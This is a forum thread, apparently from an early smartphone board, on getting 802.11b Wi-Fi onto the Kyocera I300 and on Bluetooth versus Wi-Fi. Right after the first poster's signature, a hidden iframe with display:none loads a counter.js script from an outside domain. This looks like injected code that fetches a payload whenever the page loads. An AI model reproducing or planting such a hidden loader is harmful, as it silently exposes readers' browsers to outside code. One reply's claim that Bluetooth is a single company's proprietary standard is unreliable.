+ Reply to Thread

Question 802.11b on the I300

Does anyone know of a way of utilizing an 802.11b network on the I300?

I am waiting for the manufacuturers to make a phone with 802.11 included, but I would like to have one now! I was thinking I could use a wireless bridge and connect through the serial port... or purchase the xircom 802.11b device for the palm 515 and rewire the port... but any ideas or suggestions would be appreciated. How would the device act in reference to the software on the palm?

Thanks!

Russ<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

funny you should mention this...

carriers are already thinking of ways to use the 802.11 protocol on WI-FI networks.

there is also a company out that has released equipment that could work on WI-FI networks that will allow you to use it for voice communications...

smartphonecentral.com
    Umm, actually WiFi *is* 802.11b. I think the news is that carriers are trying to develop chipsets that can use both 802.11b (WiFi) and GPRS or CDMA2000 networks.

russdog, I think you've figured out the only options for 802.11b on the i300, none of which are for the faint of soldering iron.

I'm not aware of any current smartphone that can do 802.11b. The best bet may be if SDIO WiFi cards actually emerge. I know some are in development now. I believe the Kyo 7135 will support SDIO.
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::

Administrator

Arrow

Originally posted by wHo_tHe
    Umm, actually WiFi *is* 802.11b.
    yes i know. didnt mean to make them sound like two different protocols...

Samsung's Nexio S160 will support 802.11b. Bluetooth sucks since its a proprietary standard, meaning one company owns the technology where as Wi-Fi (802.11b) is an open engineering standard. Its like Linux vs Microsoft's Windows. Besides, Bluetooth has a shorter range compared to Wi-Fi (802.11b).

smartphonecentral.com
    Bluetooth does consume far less power than 802.11, however, making it mores suitable for ultra-portable devices. Also, Bluetooth supports other classes of peripherals, like headsets and modems, making it a bit more versatile.

I've always thought of Bluetooth as sort of a "personal area network," whereas 802.11 is basically a virtual 150-foot Ethernet cord.

I like the Nexio *a lot* too...
    New smartphone discussion board! :cool:
    :: Visit smartphonecentral.com today and start talking! ::